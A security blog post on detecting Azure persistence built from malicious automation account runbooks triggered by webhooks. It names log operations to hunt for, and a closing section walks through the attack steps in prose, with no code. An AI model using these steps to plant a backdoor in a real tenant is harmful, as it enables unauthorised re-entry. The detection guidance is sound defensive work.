How to Detect Malicious Azure Persistence Through Automation Account Abuse

There are many ways an attacker can maintain persistence and create ‘backdoors’ in Azure allowing them re-entry back into the environment. Persistence is important to an attacker if compromised accounts have been discovered and removed by the victim organisation as the attackers still need to find a way to re-gain access to the environment. 

Installation of a webhook to interact with malicious runbooks created through automation accounts is one way an attacker can re-gain access into a tenant if compromised account access has been revoked. I was inspired to write this blog post about how to detect this technique when I came across an excellent post written by Karl Fosaaen detailing how an attacker can abuse automation accounts to maintain persistence. I have broken down this blog post into two sections covering both the detection methodology and the attack flow. For a more detailed attack flow, I urge you to take a read Karl’s blog as I took what he detailed in his post and recreated his attack to figure out the detection methods. 

In short, once an attacker is kicked out of a tenant, they can trigger their runbook to run, granting them access back into this tenant. This doesn’t have to be via the creation of a new user account as depicted in the clip below – it can also be any other action i.e. the remote execution of commands in VMs or addition of a key/certificate to service principles. 


If you’re interested in the detection of other Azure persistence / backdoor methods I’ve previously covered three of those techniques in other blog posts listed below: 

If you’re curious about attacks on Azure Active Directory (AAD) or M365, you can check out my attack matrix here. 


High-Level Overview of the Attack 
Automation accounts in Azure are services that allow automation of tasks through “runbooks” (similar to a job or scheduled task) which are basically PowerShell scripts that you can import and run. Several organisations I have come across have automated PowerShell scripts that run within their on-premise environment to perform various tasks – automation accounts and runbooks follow that similar concept for the Azure environment. As such, the attack concept of abusing automation accounts and runbooks is in a similar vein to the popular attack of installing malicious services or scheduled tasks. 

Once an attacker has sufficient privileges within an environment – they will be looking to establish persistence to maintain a foothold. The attackers can use an existing automation account or create a malicious automation account to register a runbook to run PowerShell scripts to conduct malicious activities such as (and not limited to):
  • Creation of a new user account to allow the attacker back into the network (the scenario we will be using as per Karl’s blog) 
  • Execution of malicious scripts on VMs
  • Adding certificates / key to the automation account for single-factor access into AAD
  • Whatever else the attacker wants to run in PowerShell based on the privileges granted to the automation account 
If the victim severs the attacker’s access to the tenant by revoking all compromised user credentials, the attacker can call a webhook to trigger their malicious runbook to run the malicious script again – leading to re-entry back into the environment. 


Detection Methodology
To detect the abuse of automation accounts and malicious run books, there are a few things to consider as this attack can be leveraged by an attacker in many ways depending on their objectives:
  • Abuse of an existing automation account i.e., assigning further privileges or permissions
  • Creation of a new automation account for malicious purposes
  • Editing of an existing runbook and to insert malicious commands
  • Creation of a new runbook that has malicious commands
  • Detection of actions / commands issued within these runbooks (this can vary depending on what the threat actor is aiming to achieve)
As such, I’ve broken down the detection into a few areas to review:
  1. Review webhook creations for signs of potentially malicious webhooks a threat actor can interact with
  2. Review webhook requests for malicious requests 
  3. Review all automation account creations for signs of malicious activity
  4. Review and assess permissions assigned to automation accounts
  5. Review all runbooks that are modified / created for signs of malicious activities 
  6. Review malicious logons and other details in audit logs that may show other suspicious activities 

The log sources that will help you in the identification of this include the Automation Account Activity Log, Subscription Activity Log, Resource Activity Log, Runbook Activity Log, Sign-in Logs, UAL and the Azure Active Directory Audit Logs. 

Step 1: Review webhook creations
If compromised accounts have been severed by the target organisation, the attacker can call a webhook to interact with their malicious runbooks to re-gain access into the target environment. For this attack path to exist, the attacker needs to register a webhook that they can use to interact with their malicious runbook. Each runbook lists the webhooks that exist within the portal. These can be tracked in the activity log for the automation account and ALSO in the subscription activity logs.

Look for the following in the automation account and subscription activity logs: 
  • Operation name: Create or Update an Azure Automation webhook
  • Operation name: Generate a URI for an Azure automation Webhook

As you can see in the screenshot below – I have indeed created a malicious webhook that I named evilWebhook. You would obviously not call your webhook such an obvious name :)



Step 2: Review malicious webhook requests
No authentication needs to occur for an attacker / user to call or interact with a webhook. As such organisations should take care not to “publicise” their webhooks as this allows direct interaction with the runbook it’s attached to. Webhook calls can be seen within the runbook input logs – as you can see here a request was made to this webhook to create a malicious user called “inverseEvil” with the password “Password123”. I leveraged this runbook published by Karl.  



Step 3: Review all automation account creations for signs of malicious activity
Please note here an attacker can use an existing automation account to conduct these actions, or they can create their own malicious one. For the creation of an automation account, these are logged under the Azure Directory Audit Logs as pictured in the highlighted line below. I would hunt for the following:
  • Category: ApplicationManagement
  • Activity: Add service principal
  • Initiated by: Managed Service Identity 

Further details relating to this creation can be seen here where you can also grep through the property of “ManagedIdentityResourceId” for “automationAccounts”. 


Step 4: Review and assess permissions assigned to automation accounts
In order for the attacker runbook to perform the tasks that the attacker wants i.e. creation of a new user account that the attacker can leverage, adding of a key/certificate to an existing service principle account, execution of commands on virtual machines – the attacker needs to ensure the automation account running the runbook has sufficient permissions. The attacker can always leverage an existing automation account with these permissions, or the attacker can assign these permissions to the automation account they’ve created or are maliciously using. The logic here is to make sure that you are constantly monitoring role assignments and modifications for potentially sensitive roles being added or assigned to service principles / user accounts. For this example, I following Karl’s blog to use the runbook maliciously to create a new user account that the attacker can then log into the tenant with. Activities pertaining to role assignments can be tracked and managed by reviewing the Azure Audit Logs for:

  • Category: RoleManagement
  • Activity: Add member to role
  • Property Role.DisplayName for sensitive roles i.e. User Administrator, Cloud Administrator,  Virtual Machine Contributor, Global Administrator etc


Step 5: Review all runbooks that are modified / created for signs of malicious activities 
In order for this attack flow to work, malicious runbooks need to be uploaded or an existing runbook needs to be modified to run malicious PowerShell. This can be tracked in SO many logs sources, this by far generates events almost everywhere. It can be seen in the Subscription Activity Logs, Resource Activity Logs, Runbook Activity Logs and the Automation Account Activity Logs. Just for the sake of example, I am showing the following from the runbook activity logs. Look for the following operation throughout these log sources:
  • Operation: Create of Update an Azure Automation Runbook
  • Operation: Publish an Azure automation runbook draft
  • Operation: Write an Azure Automation runbook draft
  • Filter: Runbook name (look for a runbook name outside the norm).
Typically Azure runbooks follow the naming convention of AzureAutomation<Something>. I would use this opportunity to do a hunt for runbooks or names that break convention or build a baseline of “known good” runbooks and hunt for malicious additions. Also note here, existing legitimate runbooks may be edited to have additional PowerShell appended to the bottom – which is why this isn’t a fail safe mechanism for detection. 



The full list of runbooks can be seen in the following path within the Automation Accounts > Account > Runbooks directory. 


Step 6: Review malicious logons and other details in audit logs that may show other suspicious activities 

I left this one to last because this final detection depends on what the runbook does. In the case of this runbook as per Karl’s blog – a new user is created to allow the attacker access back into the environment. This is relatively easy to hunt for as this is logged in the Azure Active Directory Audit logs as a new user creation made by an automation account:

Activity: Add User
Initiated By: managed Service Identity
Activity Type: Add Service Principal 
User Agent: Swagger-Codegen*



The malicious logon activity can be seen in the following location in the Azure Sign-in Logs but also in the unified audit logs :)


Attack Methodology
As mentioned previously, I followed the attack methodology detailed by Karl in his blog. For a more detailed account of the attack (as I’m summarising some of the steps here), please refer to his blog. For the sake of this blog post I wanted to post the correlating actions I ran so you can use that to refer to the detection methodology I outlined. 

Step 1: Creation of an Automation Account
The attacker needs to either leverage an EXISTING automation account or create a new one to conduct this activity. This can be done within the portal by accessing the “Automation Account” service. The automation account needs to be linked to an existing subscription and resource group.



Step 2: Import or modify existing runbook and publish the runbook
If the attacker created their own automation account, a runbook needs to be created to run whatever PowerShell commands the attacker wishes to run. If the attacker takes over an existing automation account with existing runbooks, those runbooks can be altered / modified by the attacker. In this instance, I imported a runbook made by Karl which has the goal of creating a new user account for the attacker if the attacker accounts have been discovered and removed by the target organisation. 


Once the runbook is imported or modified, the attacker will need to manually publish the runbook by going into the runbook and hitting “publish”. 

Step 3: Assign the necessary roles to the automation account
For the sake of this exercise – as our goal is to allow our runbook to create a new account that the attacker can use to access the tenant if they are locked out – the role of “User Administrator” needs to be assigned to the automation account. The roles that you choose to assign will depend on what role your runbook needs in order to complete whatever malicious operations you want your runbook to complete. Role assignments can be managed in the Azure Active Directory Roles and Assignments section.



Step 4: Create the webhook
If the attacker is locked out of all accounts and doesn’t have a way to log back into the environment – the webhook is crucial as it allows the attacker to interact with their runbook which will allow them to regain access into the environment depending on what their runbook does. The webhook is created within the specific runbook it belongs to:


The URL that it shows will only be shown on this page, there is no other way to “see” the URL again which is why it’s important to take note of this URL when you create it.

Step 5: Complete the attack!
Once the target organisation detects you and revokes all your accounts, you can trigger the webhook and create a new account to access the tenant again 



References:
https://www.netspi.com/blog/technical/cloud-penetration-testing/maintaining-azure-persistence-via-automation-accounts/
https://docs.microsoft.com/en-us/azure/automation/automation-runbook-types
https://docs.microsoft.com/en-us/azure/automation/overview






Comments

Popular posts from this blog

Forensic Analysis of AnyDesk Logs

Successful 4624 Anonymous Logons to Windows Server from External IPs?

How to Reverse Engineer and Patch an iOS Application for Beginners: Part I